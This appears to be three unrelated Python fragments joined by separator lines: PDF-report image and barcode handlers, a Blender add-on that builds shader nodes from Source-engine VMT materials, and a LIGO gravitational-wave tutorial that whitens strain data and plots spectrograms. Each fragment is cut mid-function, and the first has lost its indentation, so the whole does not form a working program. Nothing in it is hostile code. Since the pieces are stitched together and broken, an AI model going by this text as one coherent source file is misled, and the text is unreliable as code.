def img(self, e):
width = toLength(e.get('width'))
height = toLength(e.get('height'))
path = e.get('src')
align = e.get('align', 'left').upper()
background = e.get('background', 'False') == 'True'
v_align = e.get('vertical-align', 'BOTTOM').upper()
if background:
img_obj = BackgroundImage(
filename=self.get_from_url(path),
width=width,
height=height,
hAlign=align,
vAlign=v_align)
else:
img_obj = Image(filename=self.get_from_url(path), width=width, height=height)
img_obj.hAlign = align
yield img_obj
def barcode(self, e):
scale = float(e.get('scale', '1.0'))
width = toLength(e.get('width'))
height = toLength(e.get('height'))
value = e.get('value')
align = e.get('align', 'left').upper()
barcode_type = e.get('type', 'datamatrix')
barcode_obj = Barcode(library=self.barcode_library,
width=width,
height=height,
data=value,
scale=scale,
type=barcode_type,
align=align.lower())
barcode_obj.hAlign = align
yield barcode_obj
def import_pdf_font(self, base_name, face_name):
if self.fonts.get(face_name, None) is None:
afm = find(base_name + '.afm')
pfb = find(base_name + '.pfb')
ttf = find(base_name + '.ttf')
if afm:
try:
face = pdfmetrics.EmbeddedType1Face(afm, pfb)
pdfmetrics.registerTypeFace(face)
font = pdfmetrics.Font(face_name, face_name, 'WinAnsiEncoding')
pdfmetrics.registerFont(font)
except: # noqa
pass
elif ttf:
pdfmetrics.registerFont(TTFont(face_name, ttf))
| |
from vmfpy import vmt
from vmfpy.fs import VMFFileSystem
from .utils import truncate_name, is_invisible_tool, fallback_material
from typing import NamedTuple, Dict, DefaultDict, Set, Tuple, Optional, Union, Any, Iterator, Iterable, List, Callable
from abc import ABC, abstractmethod
from collections import defaultdict
import traceback
import bpy
from bpy.types import NodeTree, NodeSocket, Node
from . import import_vtf
class VMTData(NamedTuple):
    """Result of importing a VMT material: texture dimensions + material."""
    width: int
    height: int
    material: bpy.types.Material
class _PosRef():
def __init__(self, x: int = 0, y: int = 0) -> None:
self.x = x
self.y = y
def loc(self, x: int = 0, y: int = 0) -> Tuple[int, int]:
return (self.x + x, self.y + y)
def copy(self, x: int = 0, y: int = 0) -> '_PosRef':
return _PosRef(self.x + x, self.y + y)
class _MaterialInputBase(ABC):
    """Base for material inputs: nodes that feed values into node paths.

    Inputs may depend on other inputs (required_inputs); full_create lays
    the dependency tree out leftwards, creating each input only once.
    """
    def __init__(self, required_inputs: Iterable['_MaterialInputBase'] = ()) -> None:
        self.node: Node = None  # created lazily by create()
        self.required_inputs = list(required_inputs)
        # Layout footprint of this input's node(s) in editor units.
        self.dimension_x = 0
        self.dimension_y = 0
    @abstractmethod
    def create(self, node_tree: NodeTree, pos: _PosRef) -> None:
        """Create this input's node(s) at *pos* in *node_tree*."""
        pass
    def full_create(self, node_tree: NodeTree, pos: _PosRef, created_inputs: Set['_MaterialInputBase']) -> None:
        # Create this input and, recursively, any not-yet-created
        # dependencies, stacked vertically to its left.
        pos.x -= self.dimension_x
        required_input_pos = pos.copy()
        for required_input in self.required_inputs:
            if required_input in created_inputs:
                continue
            dimension_y = required_input.full_dimension_y(created_inputs)
            required_input.full_create(node_tree, required_input_pos.copy(), created_inputs)
            required_input_pos.y -= dimension_y
        self.create(node_tree, pos)
        created_inputs.add(self)
    def full_dimension_y(self, created_inputs: Set['_MaterialInputBase']) -> int:
        # Vertical space needed: own height vs. total height of uncreated deps.
        return max(
            self.dimension_y,
            sum(
                required_input.full_dimension_y(created_inputs) for required_input in self.required_inputs
                if required_input not in created_inputs
            )
        )
    def __hash__(self) -> int:
        # Identity hash so inputs can be set members regardless of content.
        return hash(id(self))
class _MaterialInputSocket():
    """Reference to one named output socket of a material input's node."""
    def __init__(self, primary_input: _MaterialInputBase, output: Any):
        self.primary_input = primary_input
        self.output_name = output
    def connect(self, node_tree: NodeTree, input_s: NodeSocket) -> None:
        """Link this socket's output into *input_s* (input must be created)."""
        out_socket = self.primary_input.node.outputs[self.output_name]
        node_tree.links.new(out_socket, input_s)
class _MaterialNode():
    """One shader node in a chain: knows its node type and in/out sockets."""
    def __init__(self, node_name: str, output_name: Union[str, int],
                 input_name: Union[str, int], used_inputs: Iterable[_MaterialInputSocket] = ()):
        self._node_name = node_name
        self._output_name = output_name
        self._input_name = input_name
        self.used_inputs: List[_MaterialInputBase] = [socket.primary_input for socket in used_inputs]
        # Layout footprint, overridden by subclasses.
        self.dimension_x = 0
        self.dimension_y = 0
    def connect_inputs(self, node_tree: NodeTree) -> None:
        # Hook for subclasses that wire extra material-input sockets after
        # all inputs have been created.
        return
    def connect(self, node_tree: NodeTree, input_s: NodeSocket, pos: _PosRef) -> NodeSocket:
        # Create the node at *pos*, wire its output into *input_s*, and
        # return its own input socket for the previous node in the chain.
        self.node: Node = node_tree.nodes.new(self._node_name)
        self.node.location = pos.loc()
        node_tree.links.new(self.node.outputs[self._output_name], input_s)
        return self.node.inputs[self._input_name]
class _MaterialNodePath():
    """A chain of _MaterialNodes from one material input to a shader socket.

    If no input is set, `const` (when given) is written into the target
    socket's default value instead of building any nodes.
    """
    def __init__(self, min_start_y: int = 0) -> None:
        self.min_start_y = min_start_y
        self.nodes: List[_MaterialNode] = []
        self.input: Optional[_MaterialInputSocket] = None
        self.const: Optional[Any] = None
    def append(self, node: _MaterialNode) -> None:
        self.nodes.append(node)
    def dimension_x(self) -> int:
        # Paths without an input build no nodes, so they occupy no space.
        if self.input is None:
            return 0
        return sum(node.dimension_x for node in self.nodes)
    def dimension_y(self) -> int:
        return max((node.dimension_y for node in self.nodes), default=0)
    def connect_path(self, node_tree: NodeTree, input_s: NodeSocket, pos: _PosRef) -> Iterator[_MaterialInputBase]:
        # Build the chain right-to-left from the target socket, yielding each
        # distinct material input encountered (deduplicated, in order).
        if self.input is None:
            if self.const is not None:
                input_s.default_value = self.const
            return
        yielded_inputs: Dict[_MaterialInputBase, _MaterialInputBase] = {}
        for node in reversed(self.nodes):
            pos.x -= node.dimension_x
            input_s = node.connect(node_tree, input_s, pos)
            yield from (yielded_inputs.setdefault(inp, inp) for inp in node.used_inputs if inp not in yielded_inputs)
        # Remember the chain head so connect_inputs can finish the wiring
        # after the inputs themselves have been created.
        self._input_s = input_s
        self._input_pos = pos
        if self.input.primary_input not in yielded_inputs:
            yield self.input.primary_input
    def connect_inputs(self, node_tree: NodeTree) -> None:
        # Second pass: link the (now-created) input node into the chain head.
        if self.input is None:
            return
        self.input.connect(node_tree, self._input_s)
        for node in self.nodes:
            node.connect_inputs(node_tree)
class _DXNormalMapConverterMaterialNode(_MaterialNode):
    """Converts a DirectX-style normal map for Blender.

    Splits RGB, computes G = 1 - G (inverting the green channel), and
    recombines — the green-channel flip between the DirectX and OpenGL
    normal-map conventions.
    """
    def __init__(self) -> None:
        super().__init__('ShaderNodeCombineRGB', 'Image', 'G')
        self.dimension_x = 600
        self.dimension_y = 200
    def connect(self, node_tree: NodeTree, input_s: NodeSocket, pos: _PosRef) -> NodeSocket:
        separate_node: Node = node_tree.nodes.new('ShaderNodeSeparateRGB')
        separate_node.location = pos.loc()
        # 1 - G via a SUBTRACT math node.
        invert_node: Node = node_tree.nodes.new('ShaderNodeMath')
        invert_node.location = pos.loc(200)
        invert_node.operation = 'SUBTRACT'
        invert_node.inputs[0].default_value = 1.0
        node_tree.links.new(separate_node.outputs['G'], invert_node.inputs[1])
        # The Combine node (self.node) is created by the base connect();
        # it returns the G input socket per the base-class configuration.
        g_input = super().connect(node_tree, input_s, pos.copy(400))
        node_tree.links.new(separate_node.outputs['R'], self.node.inputs['R'])
        node_tree.links.new(invert_node.outputs[0], g_input)
        node_tree.links.new(separate_node.outputs['B'], self.node.inputs['B'])
        return separate_node.inputs['Image']
class _NormalMapMaterialNode(_MaterialNode):
    """Wraps a Normal Map shader node (Color in, Normal out)."""
    def __init__(self) -> None:
        super().__init__('ShaderNodeNormalMap', 'Normal', 'Color')
        self.dimension_x, self.dimension_y = 200, 200
class _InvertMaterialNode(_MaterialNode):
    """Computes 1 - x via a SUBTRACT math node."""
    def __init__(self) -> None:
        super().__init__('ShaderNodeMath', 0, 1)
        self.dimension_x, self.dimension_y = 200, 200
    def connect(self, node_tree: NodeTree, input_s: NodeSocket, pos: _PosRef) -> NodeSocket:
        chained_input = super().connect(node_tree, input_s, pos)
        self.node.operation = 'SUBTRACT'
        self.node.inputs[0].default_value = 1.0
        return chained_input
class _MultiplyMaterialNode(_MaterialNode):
    """Multiplies its input by a constant factor via a MULTIPLY math node."""
    def __init__(self, factor: float) -> None:
        super().__init__('ShaderNodeMath', 0, 0)
        self.factor = factor
        self.dimension_x, self.dimension_y = 200, 200
    def connect(self, node_tree: NodeTree, input_s: NodeSocket, pos: _PosRef) -> NodeSocket:
        chained_input = super().connect(node_tree, input_s, pos)
        self.node.operation = 'MULTIPLY'
        self.node.inputs[1].default_value = self.factor
        return chained_input
class _MultiplyRGBMaterialNode(_MaterialNode):
    """Multiplies a color path by a color (and factor) via a MixRGB node.

    Both the color and the factor may be constants or material-input
    sockets; socket-backed values are wired up later in connect_inputs.
    """
    def __init__(self, color: Union[Tuple[float, float, float], _MaterialInputSocket],
                 factor: Union[float, _MaterialInputSocket] = 1) -> None:
        # Only socket-backed values count as node dependencies.
        inputs = []
        if isinstance(color, _MaterialInputSocket):
            inputs.append(color)
        if isinstance(factor, _MaterialInputSocket):
            inputs.append(factor)
        super().__init__('ShaderNodeMixRGB', 'Color', 'Color1', inputs)
        self.color = color
        self.factor = factor
        self.dimension_x = 200
        self.dimension_y = 250
    def connect(self, node_tree: NodeTree, input_s: NodeSocket, pos: _PosRef) -> NodeSocket:
        input_s = super().connect(node_tree, input_s, pos)
        self.node.blend_type = 'MULTIPLY'
        # Constant values can be set immediately; sockets wait for
        # connect_inputs once their nodes exist.
        if not isinstance(self.factor, _MaterialInputSocket):
            self.node.inputs['Fac'].default_value = self.factor
        if not isinstance(self.color, _MaterialInputSocket):
            self.node.inputs['Color2'].default_value = (self.color[0], self.color[1], self.color[2], 1)
        return input_s
    def connect_inputs(self, node_tree: NodeTree) -> None:
        # Wire socket-backed factor/color now that their nodes are created.
        if isinstance(self.factor, _MaterialInputSocket):
            self.factor.connect(node_tree, self.node.inputs['Fac'])
        if isinstance(self.color, _MaterialInputSocket):
            self.color.connect(node_tree, self.node.inputs['Color2'])
class _SubtractMaterialNode(_MaterialNode):
    """Subtracts a constant from its input via a SUBTRACT math node."""
    def __init__(self, value: float) -> None:
        super().__init__('ShaderNodeMath', 0, 0)
        self.value = value
        self.dimension_x, self.dimension_y = 200, 200
    def connect(self, node_tree: NodeTree, input_s: NodeSocket, pos: _PosRef) -> NodeSocket:
        chained_input = super().connect(node_tree, input_s, pos)
        self.node.operation = 'SUBTRACT'
        self.node.inputs[1].default_value = self.value
        return chained_input
class _SsbumpToNormalMaterialNode(_MaterialNode):
    """Converts a Source-engine ssbump map into a regular tangent normal.

    Builds sum(channel_i * basis_i) over three basis vectors, normalizes,
    then remaps from [-1, 1] to [0, 1] color space before the Normal Map
    node. The constants are presumably Source's ssbump basis vectors —
    TODO confirm against Valve's ssbump documentation.
    """
    def __init__(self) -> None:
        super().__init__('ShaderNodeNormalMap', 0, 1)
        self.dimension_x = 1300
        self.dimension_y = 600
    def connect(self, node_tree: NodeTree, input_s: NodeSocket, pos: _PosRef) -> NodeSocket:
        # Base connect creates the Normal Map node at the right end.
        input_s = super().connect(node_tree, input_s, pos.copy(1150, 0))
        # Remap [-1, 1] -> [0, 1]: (v * 0.5) + 0.5, applied right-to-left.
        add_node: Node = node_tree.nodes.new('ShaderNodeVectorMath')
        add_node.location = pos.loc(1000, 0)
        add_node.operation = 'ADD'
        add_node.inputs[1].default_value = (0.5, 0.5, 0.5)
        node_tree.links.new(add_node.outputs[0], input_s)
        multiply_node: Node = node_tree.nodes.new('ShaderNodeVectorMath')
        multiply_node.location = pos.loc(850, 0)
        multiply_node.operation = 'MULTIPLY'
        multiply_node.inputs[1].default_value = (0.5, 0.5, 0.5)
        node_tree.links.new(multiply_node.outputs[0], add_node.inputs[0])
        normalize_node: Node = node_tree.nodes.new('ShaderNodeVectorMath')
        normalize_node.location = pos.loc(700, 0)
        normalize_node.operation = 'NORMALIZE'
        node_tree.links.new(normalize_node.outputs[0], multiply_node.inputs[0])
        # Sum of the three per-channel basis contributions (two ADDs).
        add_node2: Node = node_tree.nodes.new('ShaderNodeVectorMath')
        add_node2.location = pos.loc(550, 0)
        add_node2.operation = 'ADD'
        node_tree.links.new(add_node2.outputs[0], normalize_node.inputs[0])
        add_node1: Node = node_tree.nodes.new('ShaderNodeVectorMath')
        add_node1.location = pos.loc(400, 0)
        add_node1.operation = 'ADD'
        node_tree.links.new(add_node1.outputs[0], add_node2.inputs[0])
        # channel_X * basis_X, channel_Y * basis_Y, channel_Z * basis_Z.
        multiply_node_x: Node = node_tree.nodes.new('ShaderNodeVectorMath')
        multiply_node_x.location = pos.loc(200, 0)
        multiply_node_x.operation = 'MULTIPLY'
        multiply_node_x.inputs[1].default_value = (0.81649661064147949, 0.0, 0.57735025882720947)
        node_tree.links.new(multiply_node_x.outputs[0], add_node1.inputs[0])
        multiply_node_y: Node = node_tree.nodes.new('ShaderNodeVectorMath')
        multiply_node_y.location = pos.loc(200, 200)
        multiply_node_y.operation = 'MULTIPLY'
        multiply_node_y.inputs[1].default_value = (-0.40824833512306213, 0.70710676908493042, 0.57735025882720947)
        node_tree.links.new(multiply_node_y.outputs[0], add_node1.inputs[1])
        multiply_node_z: Node = node_tree.nodes.new('ShaderNodeVectorMath')
        multiply_node_z.location = pos.loc(200, 400)
        multiply_node_z.operation = 'MULTIPLY'
        multiply_node_z.inputs[1].default_value = (-0.40824821591377258, -0.7071068286895752, 0.57735025882720947)
        node_tree.links.new(multiply_node_z.outputs[0], add_node2.inputs[1])
        # Entry point: split the incoming ssbump color into channels.
        separate_node: Node = node_tree.nodes.new('ShaderNodeSeparateXYZ')
        separate_node.location = pos.loc()
        node_tree.links.new(separate_node.outputs['X'], multiply_node_x.inputs[0])
        node_tree.links.new(separate_node.outputs['Y'], multiply_node_y.inputs[0])
        node_tree.links.new(separate_node.outputs['Z'], multiply_node_z.inputs[0])
        return separate_node.inputs['Vector']
class _TextureInputBase(_MaterialInputBase):
    """Abstract texture input exposing color, per-channel and alpha sockets."""
    color: _MaterialInputSocket
    channels: '_SplitTextureInput'
    alpha: _MaterialInputSocket
    @abstractmethod
    def setimage(self, image: import_vtf.StagedImage) -> None:
        """Set the staged VTF image this input will load in create()."""
        pass
class _TextureInput(_TextureInputBase):
    """A texture input backed by a single image-texture shader node."""
    def __init__(self, interpolation: str = 'Linear') -> None:
        super().__init__()
        self.interpolation = interpolation
        self.image: Optional[import_vtf.StagedImage] = None
        self.color = _MaterialInputSocket(self, 'Color')
        self.channels = _SplitTextureInput(self.color)
        self.alpha = _MaterialInputSocket(self, 'Alpha')
        self.dimension_x, self.dimension_y = 300, 300
    def setimage(self, image: import_vtf.StagedImage) -> None:
        self.image = image
    def create(self, node_tree: NodeTree, pos: _PosRef) -> None:
        """Create the image-texture node; requires setimage() first."""
        if self.image is None:
            raise Exception("texture input doesn't contain an image")
        tex_node: Node = node_tree.nodes.new('ShaderNodeTexImage')
        tex_node.image = self.image.get_image()
        tex_node.interpolation = self.interpolation
        tex_node.location = pos.loc()
        self.node = tex_node
class _TransformedTextureInput(_TextureInput):
    """Texture input with a UV transform (scale / rotate / translate) applied.

    NOTE(review): the default translate of (1, 1) shifts UVs by exactly one
    tile, which is visually a no-op for repeating textures — confirm whether
    (0, 0) was intended.
    """

    def __init__(self, scale: Tuple[float, float] = (1, 1), rotate: float = 0, translate: Tuple[float, float] = (1, 1),
                 interpolation: str = 'Linear'):
        super().__init__(interpolation)
        self.scale = scale
        self.rotate = rotate
        self.translate = translate
        # Larger layout footprint: three nodes instead of one.
        self.dimension_x = 700
        self.dimension_y = 400

    def create(self, node_tree: NodeTree, pos: _PosRef) -> None:
        """Create the image node plus a TexCoord -> Mapping chain feeding it."""
        super().create(node_tree, pos)
        uv_source: Node = node_tree.nodes.new('ShaderNodeTexCoord')
        uv_source.location = pos.loc()
        transform: Node = node_tree.nodes.new('ShaderNodeMapping')
        transform.inputs['Scale'].default_value = (self.scale[0], self.scale[1], 1)
        transform.inputs['Rotation'].default_value = (0, 0, self.rotate)
        transform.inputs['Location'].default_value = (self.translate[0], self.translate[1], 0)
        transform.location = pos.loc(200)
        node_tree.links.new(uv_source.outputs['UV'], transform.inputs['Vector'])
        # Re-home the image node created by super() to the right of the chain.
        self.node.location = pos.loc(400)
        node_tree.links.new(transform.outputs['Vector'], self.node.inputs['Vector'])
class _SplitTextureInput(_MaterialInputBase):
    """Splits a color socket into separate R, G and B sockets."""

    def __init__(self, texture_input: _MaterialInputSocket) -> None:
        super().__init__((texture_input.primary_input, ))
        self.input = texture_input
        # One output socket per color channel.
        self.r, self.g, self.b = (_MaterialInputSocket(self, channel) for channel in ('R', 'G', 'B'))
        self.dimension_x = 200
        self.dimension_y = 200

    def create(self, node_tree: NodeTree, pos: _PosRef) -> None:
        """Create a Separate RGB node fed by the wrapped color socket."""
        split_node: Node = node_tree.nodes.new('ShaderNodeSeparateRGB')
        split_node.location = pos.loc()
        self.node = split_node
        self.input.connect(node_tree, split_node.inputs['Image'])
class _BlendedTextureInput(_TextureInputBase):
    """Texture input mixing two other texture inputs by a blend factor."""

    def __init__(self, fac_inp: Union[_MaterialInputSocket, float],
                 a_inp: _TextureInputBase, b_inp: _TextureInputBase) -> None:
        super().__init__()
        self.input1 = a_inp
        self.input2 = b_inp
        # Color and alpha come from dedicated blend helpers; the channel
        # split is derived from the blended color.
        self.color: _MaterialInputSocket = _BlendedColorInput(fac_inp, self.input1.color, self.input2.color).color
        self.channels = _SplitTextureInput(self.color)
        self.alpha: _MaterialInputSocket = _BlendedValueInput(fac_inp, self.input1.alpha, self.input2.alpha).value

    def setimage(self, image: import_vtf.StagedImage) -> None:
        # NOTE(review): only the first blended input receives the image —
        # confirm the second input is given its image elsewhere.
        self.input1.setimage(image)

    def create(self, node_tree: NodeTree, pos: _PosRef) -> None:
        # Nothing to create here: all nodes are owned by the helper inputs above.
        pass
class _DetailedTextureInput(_TextureInputBase):
    """Texture input that modulates a base texture with a detail texture.

    The detail color is doubled (so mid-gray detail is neutral) and then
    multiplied into the base color with the configured blend strength.
    """

    def __init__(self, base_inp: _TextureInputBase, detail_inp: _TextureInputBase, blend: float = 1) -> None:
        super().__init__((base_inp, detail_inp))
        self.base_inp = base_inp
        self.detail_inp = detail_inp
        self.blend = blend
        self.color = _MaterialInputSocket(self, 'Color')
        self.channels = _SplitTextureInput(self.color)
        # Alpha passes straight through from the base texture.
        self.alpha = base_inp.alpha
        self.dimension_x = 400
        self.dimension_y = 250

    def setimage(self, image: import_vtf.StagedImage) -> None:
        """Forward the staged image to the base texture input."""
        self.base_inp.setimage(image)

    def create(self, node_tree: NodeTree, pos: _PosRef) -> None:
        """Create the detail-doubling and detail-apply mix nodes."""
        doubler: Node = node_tree.nodes.new('ShaderNodeMixRGB')
        doubler.blend_type = 'MULTIPLY'
        doubler.location = pos.loc()
        # Multiplying by (2, 2, 2) makes 0.5-gray detail a no-op.
        doubler.inputs['Color2'].default_value = (2, 2, 2, 1)
        doubler.inputs['Fac'].default_value = 1
        self.detail_inp.color.connect(node_tree, doubler.inputs['Color1'])
        apply_node: Node = node_tree.nodes.new('ShaderNodeMixRGB')
        apply_node.location = pos.loc(200)
        apply_node.blend_type = 'MULTIPLY'
        apply_node.inputs['Fac'].default_value = self.blend
        self.node = apply_node
        self.base_inp.color.connect(node_tree, apply_node.inputs['Color1'])
        node_tree.links.new(doubler.outputs['Color'], apply_node.inputs['Color2'])
class _BlendedColorInput(_MaterialInputBase):
def __init__(self, fac_inp: Union[_MaterialInputSocket, float],
a_inp: _MaterialInputSocket, b_inp: _MaterialInputSocket):
if isinstance(fac_inp, _MaterialInputSocket):
super().__init__((fac_inp.primary_input, a_inp.primary_input, b_inp.primary_input))
| |
# Whitening requires no prior knowledge of spectral lines, etc; only the data are needed.
#
# To get rid of remaining high frequency noise, we will also bandpass the data.
#
# The resulting time series is no longer in units of strain; now in units of "sigmas" away from the mean.
#
# We will plot the whitened strain data, along with the signal template, after the matched filtering section, below.
# In[10]:
# function to whiten data
def whiten(strain, interp_psd, dt):
    """Whiten a strain time series by its amplitude spectral density.

    Transforms to the frequency domain, divides by the ASD (sqrt of the
    interpolated PSD), and transforms back, taking care to get the
    normalization right.  The result is no longer in units of strain but
    in "sigmas" away from the mean.

    Parameters:
        strain: time-domain strain samples (1-D array).
        interp_psd: callable returning the PSD at the given frequencies.
        dt: sample spacing in seconds.

    Returns:
        The whitened time series as a numpy array of the same length.
    """
    Nt = len(strain)
    freqs = np.fft.rfftfreq(Nt, dt)
    # (removed unused `freqs1`: its `np.linspace(..., Nt/2+1)` passed a float
    # sample count, which raises TypeError on modern NumPy.)
    hf = np.fft.rfft(strain)
    norm = 1./np.sqrt(1./(dt*2))
    white_hf = hf / np.sqrt(interp_psd(freqs)) * norm
    white_ht = np.fft.irfft(white_hf, n=Nt)
    return white_ht
# Flag kept as an int (1/0) in the notebook's style; used as a boolean below.
whiten_data = 1
if whiten_data:
    # now whiten the data from H1 and L1, and the template (use H1 PSD):
    strain_H1_whiten = whiten(strain_H1,psd_H1,dt)
    strain_L1_whiten = whiten(strain_L1,psd_L1,dt)
    # We need to suppress the high frequency noise (no signal!) with some bandpassing:
    # 4th-order Butterworth bandpass; `fband` and `fs` are defined earlier in the script.
    bb, ab = butter(4, [fband[0]*2./fs, fband[1]*2./fs], btype='band')
    # Presumably rescales for the reduced bandwidth after bandpassing — confirm.
    normalization = np.sqrt((fband[1]-fband[0])/(fs/2))
    strain_H1_whitenbp = filtfilt(bb, ab, strain_H1_whiten) / normalization
    strain_L1_whitenbp = filtfilt(bb, ab, strain_L1_whiten) / normalization
# ## Spectrograms
#
# Now let's plot a short time-frequency spectrogram around our event:
# In[11]:
# Plot short time-frequency spectrograms of the raw strain around the event.
if make_plots:
    # index into the strain time series for this time interval:
    indxt = np.where((time >= tevent-deltat) & (time < tevent+deltat))
    # pick a shorter FTT time interval, like 1/8 of a second:
    NFFT = int(fs/8)
    # and with a lot of overlap, to resolve short-time features:
    NOVL = int(NFFT*15./16)
    # and choose a window that minimizes "spectral leakage"
    # (https://en.wikipedia.org/wiki/Spectral_leakage)
    window = np.blackman(NFFT)
    # the right colormap is all-important! See:
    # http://matplotlib.org/examples/color/colormaps_reference.html
    # viridis seems to be the best for our purposes, but it's new; if you don't have it, you can settle for ocean.
    #spec_cmap='viridis'
    spec_cmap='ocean'
    # Plot the H1 spectrogram:
    plt.figure(figsize=(10,6))
    spec_H1, freqs, bins, im = plt.specgram(strain_H1[indxt], NFFT=NFFT, Fs=fs, window=window,
                                            noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat])
    plt.xlabel('time (s) since '+str(tevent))
    plt.ylabel('Frequency (Hz)')
    plt.colorbar()
    plt.axis([-deltat, deltat, 0, 2000])
    plt.title('aLIGO H1 strain data near '+eventname)
    plt.savefig(eventname+'_H1_spectrogram.'+plottype)
    # Plot the L1 spectrogram:
    plt.figure(figsize=(10,6))
    # fixed: previously assigned to spec_H1, clobbering the H1 result.
    spec_L1, freqs, bins, im = plt.specgram(strain_L1[indxt], NFFT=NFFT, Fs=fs, window=window,
                                            noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat])
    plt.xlabel('time (s) since '+str(tevent))
    plt.ylabel('Frequency (Hz)')
    plt.colorbar()
    plt.axis([-deltat, deltat, 0, 2000])
    plt.title('aLIGO L1 strain data near '+eventname)
    plt.savefig(eventname+'_L1_spectrogram.'+plottype)
# In the above spectrograms, you may see lots of excess power below ~20 Hz, as well as strong spectral lines at 500, 1000, 1500 Hz (also evident in the ASDs above). The lines at multiples of 500 Hz are the harmonics of the "violin modes" of the fibers holding up the mirrors of the Advanced LIGO interferometers.
#
# Now let's zoom in on where we think the signal is, using the whitened data, in the hope of seeing a chirp:
# In[12]:
# Zoomed whitened spectrograms around the expected signal, hoping to see a chirp.
if make_plots:
    # plot the whitened data, zooming in on the signal region:
    # pick a shorter FTT time interval, like 1/16 of a second:
    NFFT = int(fs/16.0)
    # and with a lot of overlap, to resolve short-time features:
    NOVL = int(NFFT*15/16.0)
    # choose a window that minimizes "spectral leakage"
    # (https://en.wikipedia.org/wiki/Spectral_leakage)
    window = np.blackman(NFFT)
    # Plot the H1 whitened spectrogram around the signal
    plt.figure(figsize=(10,6))
    spec_H1, freqs, bins, im = plt.specgram(strain_H1_whiten[indxt], NFFT=NFFT, Fs=fs, window=window,
                                            noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat])
    plt.xlabel('time (s) since '+str(tevent))
    plt.ylabel('Frequency (Hz)')
    plt.colorbar()
    plt.axis([-0.5, 0.5, 0, 500])
    plt.title('aLIGO H1 strain data near '+eventname)
    plt.savefig(eventname+'_H1_spectrogram_whitened.'+plottype)
    # Plot the L1 whitened spectrogram around the signal
    plt.figure(figsize=(10,6))
    # fixed: use spec_L1 for the L1 data instead of overwriting spec_H1.
    spec_L1, freqs, bins, im = plt.specgram(strain_L1_whiten[indxt], NFFT=NFFT, Fs=fs, window=window,
                                            noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat])
    plt.xlabel('time (s) since '+str(tevent))
    plt.ylabel('Frequency (Hz)')
    plt.colorbar()
    plt.axis([-0.5, 0.5, 0, 500])
    plt.title('aLIGO L1 strain data near '+eventname)
    plt.savefig(eventname+'_L1_spectrogram_whitened.'+plottype)
# Loud (high SNR) signals may be visible in these spectrograms. Compact object mergers show a characteristic "chirp" as the signal rises in frequency. If you can't see anything, try
# <a href='https://losc.ligo.org/events/GW150914/'>event GW150914</a>, by changing the `eventname` variable in the first cell above.
# ## Waveform Template
#
# The results of a full LIGO-Virgo analysis of this BBH event include a set of parameters that are consistent with a range of parameterized waveform templates. Here we pick one for use in matched filtering.
#
# As noted above, the results won't be identical to what is in the LIGO-Virgo papers, since we're skipping many subtleties, such as combining many consistent templates.
# In[13]:
# read in the template (plus and cross) and parameters for the theoretical waveform
try:
    f_template = h5py.File(fn_template, "r")
except OSError:
    # Narrowed from a bare `except:`: only a missing/unreadable file should
    # trigger this message (h5py raises OSError for those); programming
    # errors now propagate instead of being swallowed.
    print("Cannot find template file!")
    print("You can download it from https://losc.ligo.org/s/events/"+eventname+'/'+fn_template)
    print("Quitting.")
    quit()
# In[14]:
# extract metadata from the template file:
template_p, template_c = f_template["template"][...]
t_m1 = f_template["/meta"].attrs['m1']
t_m2 = f_template["/meta"].attrs['m2']
t_a1 = f_template["/meta"].attrs['a1']
t_a2 = f_template["/meta"].attrs['a2']
t_approx = f_template["/meta"].attrs['approx']
f_template.close()
# the template extends to roughly 16s, zero-padded to the 32s data length. The merger will be roughly 16s in.
template_offset = 16.
# whiten the templates (using the H1 PSD for both polarizations):
template_p_whiten = whiten(template_p,psd_H1,dt)
template_c_whiten = whiten(template_c,psd_H1,dt)
template_p_whitenbp = filtfilt(bb, ab, template_p_whiten) / normalization
template_c_whitenbp = filtfilt(bb, ab, template_c_whiten) / normalization
# Compute, print and plot some properties of the template:
# constants:
clight = 2.99792458e8 # m/s
G = 6.67259e-11 # m^3/kg/s^2
MSol = 1.989e30 # kg
# template parameters: masses in units of MSol:
t_mtot = t_m1+t_m2
# final BH mass is typically 95% of the total initial mass:
t_mfin = t_mtot*0.95
# Final BH radius, in km (2*G*M/c^2, converted from m to km):
R_fin = 2*G*t_mfin*MSol/clight**2/1000.
# complex template (plus polarization real, cross imaginary):
template = (template_p + template_c*1.j)
ttime = time-time[0]-template_offset
# compute the instantaneous frequency of this chirp-like signal:
tphase = np.unwrap(np.angle(template))
fGW = np.gradient(tphase)*fs/(2.*np.pi)
# fix discontinuities at the very end:
# iffix = np.where(np.abs(np.gradient(fGW)) > 100.)[0]
# where the template amplitude is negligible, hold the last good frequency:
iffix = np.where(np.abs(template) < np.abs(template).max()*0.001)[0]
fGW[iffix] = fGW[iffix[0]-1]
fGW[np.where(fGW < 1.)] = fGW[iffix[0]-1]
# compute v/c:
voverc = (G*t_mtot*MSol*np.pi*fGW/clight**3)**(1./3.)
# index where f_GW is in-band:
f_inband = fband[0]
iband = np.where(fGW > f_inband)[0][0]
# index at the peak of the waveform:
ipeak = np.argmax(np.abs(template))
# number of cycles between inband and peak:
Ncycles = (tphase[ipeak]-tphase[iband])/(2.*np.pi)
print('Properties of waveform template in {0}'.format(fn_template))
print("Waveform family = {0}".format(t_approx))
print("Masses = {0:.2f}, {1:.2f} Msun".format(t_m1,t_m2))
print('Mtot = {0:.2f} Msun, mfinal = {1:.2f} Msun '.format(t_mtot,t_mfin))
print("Spins = {0:.2f}, {1:.2f}".format(t_a1,t_a2))
print('Freq at inband, peak = {0:.2f}, {1:.2f} Hz'.format(fGW[iband],fGW[ipeak]))
print('Time at inband, peak = {0:.2f}, {1:.2f} s'.format(ttime[iband],ttime[ipeak]))
print('Duration (s) inband-peak = {0:.2f} s'.format(ttime[ipeak]-ttime[iband]))
print('N_cycles inband-peak = {0:.0f}'.format(Ncycles))
print('v/c at peak = {0:.2f}'.format(voverc[ipeak]))
print('Radius of final BH = {0:.0f} km'.format(R_fin))
if make_plots:
    # Four stacked panels: full template, zoomed template, f_GW, and v/c.
    plt.figure(figsize=(10,16))
    plt.subplot(4,1,1)
    plt.plot(ttime,template_p)
    plt.xlim([-template_offset,1.])
    plt.grid()
    plt.xlabel('time (s)')
    plt.ylabel('strain')
    plt.title(eventname+' template at D_eff = 1 Mpc')
    plt.subplot(4,1,2)
    plt.plot(ttime,template_p)
    plt.xlim([-1.1,0.1])
    plt.grid()
    plt.xlabel('time (s)')
    plt.ylabel('strain')
    #plt.title(eventname+' template at D_eff = 1 Mpc')
